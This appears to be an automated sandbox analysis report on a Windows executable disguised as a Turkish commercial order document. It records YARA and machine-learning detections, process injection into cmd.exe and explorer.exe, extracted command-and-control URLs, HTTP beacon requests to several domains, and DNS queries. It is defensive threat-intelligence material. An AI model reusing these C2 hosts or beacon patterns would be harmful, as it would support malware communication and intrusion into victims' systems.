Windows Analysis Report
Ticari Siparis Belgesi 26 07 2024 17545000600.exe

AI detected suspicious sample

Source: Yara match	File source: 6.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4539184982.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4538973840.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2128443100.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4539570666.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2190313721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Joe Sandbox ML: detected

Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: bBvN.pdbSHA256 source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe
Source:	Binary string: cmd.pdbUGP source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe, 00000006.00000002.2192065955.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, 00000008.00000002.4538576758.0000000000790000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe, 00000006.00000002.2191061034.00000000011D0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.4539998201.0000000003750000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000008.00000003.2192228602.000000000359D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000003.2190559274.00000000033E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.4539998201.00000000038EE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe, Ticari Siparis Belgesi 26 07 2024 17545000600.exe, 00000006.00000002.2191061034.00000000011D0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, cmd.exe, 00000008.00000002.4539998201.0000000003750000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000008.00000003.2192228602.000000000359D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000003.2190559274.00000000033E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.4539998201.00000000038EE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: bBvN.pdb source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe
Source:	Binary string: cmd.pdb source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe, 00000006.00000002.2192065955.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, cmd.exe, 00000008.00000002.4538576758.0000000000790000.00000040.80000000.00040000.00000000.sdmp

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	8_2_007A589A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007B3E66 FindFirstFileW,FindNextFileW,FindClose,	8_2_007B3E66
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	8_2_007A0207
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	8_2_007A4EC1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0079532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	8_2_0079532E

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 4x nop then pop ebx	6_2_00407B1B
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 4x nop then pop edi	6_2_00416CEB
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 4x nop then pop ebx	8_2_02E37B1B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 4x nop then pop edi	8_2_02E46CEB

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 207.241.198.3 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 108.157.194.11 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.jnhdh8827.com/pz12/

Source: global traffic	HTTP traffic detected: GET /pz12/?XvRxR=rTfdhh5hH2&NBtT=XLxih9erqU5OQ/zVa2U9uayzQwvQYqwD+iUwcFTJkQJbXUUHI+Ws7VPKfbblI2vONd0o HTTP/1.1Host: www.datalakeflow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz12/?XvRxR=rTfdhh5hH2&NBtT=9hrk18skSQhCCsrWhUPNj3yaKA8UlZiY5Un3cfGqWer7qRPGp2VeMQg9udTNeDooaK7+ HTTP/1.1Host: www.chalkandthimble.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz12/?XvRxR=rTfdhh5hH2&NBtT=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9L1MEhp7dpaA HTTP/1.1Host: www.loyalbahis356.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 108.157.194.11 108.157.194.11

Source: Joe Sandbox View	ASN Name: LIGHTSOURCE-US LIGHTSOURCE-US
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 7_2_10464F82 getaddrinfo,setsockopt,recv,

7_2_10464F82

Source: global traffic	HTTP traffic detected: GET /pz12/?XvRxR=rTfdhh5hH2&NBtT=XLxih9erqU5OQ/zVa2U9uayzQwvQYqwD+iUwcFTJkQJbXUUHI+Ws7VPKfbblI2vONd0o HTTP/1.1Host: www.datalakeflow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz12/?XvRxR=rTfdhh5hH2&NBtT=9hrk18skSQhCCsrWhUPNj3yaKA8UlZiY5Un3cfGqWer7qRPGp2VeMQg9udTNeDooaK7+ HTTP/1.1Host: www.chalkandthimble.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz12/?XvRxR=rTfdhh5hH2&NBtT=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9L1MEhp7dpaA HTTP/1.1Host: www.loyalbahis356.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: www.datalakeflow.com
Source: global traffic	DNS traffic detected: DNS query: www.xcxocef.shop
Source: global traffic	DNS traffic detected: DNS query: www.chalkandthimble.com
Source: global traffic	DNS traffic detected: DNS query: www.xiangadvanced.site
Source: global traffic	DNS traffic detected: DNS query: www.317wb.com
Source: global traffic	DNS traffic detected: DNS query: www.loyalbahis356.com
Source: global traffic	DNS traffic detected: DNS query: www.aromacuppa.com
Source: global traffic	DNS traffic detected: DNS query: www.autonwheels.com
Source: global traffic	DNS traffic detected: DNS query: www.vanessasmobilespa.com
Source: global traffic	DNS traffic detected: DNS query: www.98980901.com
Source: global traffic	DNS traffic detected: DNS query: www.jnhdh8827.com

Source: explorer.exe, 00000007.00000002.4545593539.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094747325.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094747325.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4545593539.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000007.00000002.4538762767.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2131821278.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 00000007.00000002.4545593539.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094747325.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094747325.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4545593539.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000007.00000002.4545593539.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094747325.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094747325.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4545593539.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000007.00000002.4545593539.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094747325.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094747325.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4545593539.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000007.00000003.3094747325.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4545593539.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000007.00000000.2137907662.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2142461714.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4544751645.0000000008870000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe, 00000000.00000002.2128019151.0000000002A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.317wb.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.317wb.com/pz12/
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.317wb.com/pz12/www.loyalbahis356.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.317wb.comReferer:
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.98980901.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.98980901.com/pz12/
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.98980901.com/pz12/www.jnhdh8827.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.98980901.comReferer:
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aromacuppa.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aromacuppa.com/pz12/
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aromacuppa.com/pz12/www.autonwheels.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aromacuppa.comReferer:
Source: explorer.exe, 00000007.00000000.2149075288.000000000C860000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3103961985.000000000C860000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autonwheels.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autonwheels.com/pz12/
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autonwheels.com/pz12/www.vanessasmobilespa.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autonwheels.comReferer:
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.brenjitu1904.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.brenjitu1904.com/pz12/
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.brenjitu1904.com/pz12/www.salesgymshark.shop
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.brenjitu1904.comReferer:
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.businessbroadway.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.businessbroadway.com/pz12/
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.businessbroadway.com/pz12/www.qqfoodsolutions.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.businessbroadway.comReferer:
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.chalkandthimble.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.chalkandthimble.com/pz12/
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.chalkandthimble.com/pz12/www.xiangadvanced.site
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.chalkandthimble.comReferer:
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cripmz.xyz
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cripmz.xyz/pz12/
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cripmz.xyz/pz12/www.317wb.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cripmz.xyzReferer:
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.datalakeflow.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.datalakeflow.com/pz12/
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.datalakeflow.com/pz12/www.xcxocef.shop
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.datalakeflow.comReferer:
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jnhdh8827.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jnhdh8827.com/pz12/
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jnhdh8827.com/pz12/www.brenjitu1904.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jnhdh8827.comReferer:
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.loyalbahis356.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.loyalbahis356.com/pz12/
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.loyalbahis356.com/pz12/www.aromacuppa.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.loyalbahis356.comReferer:
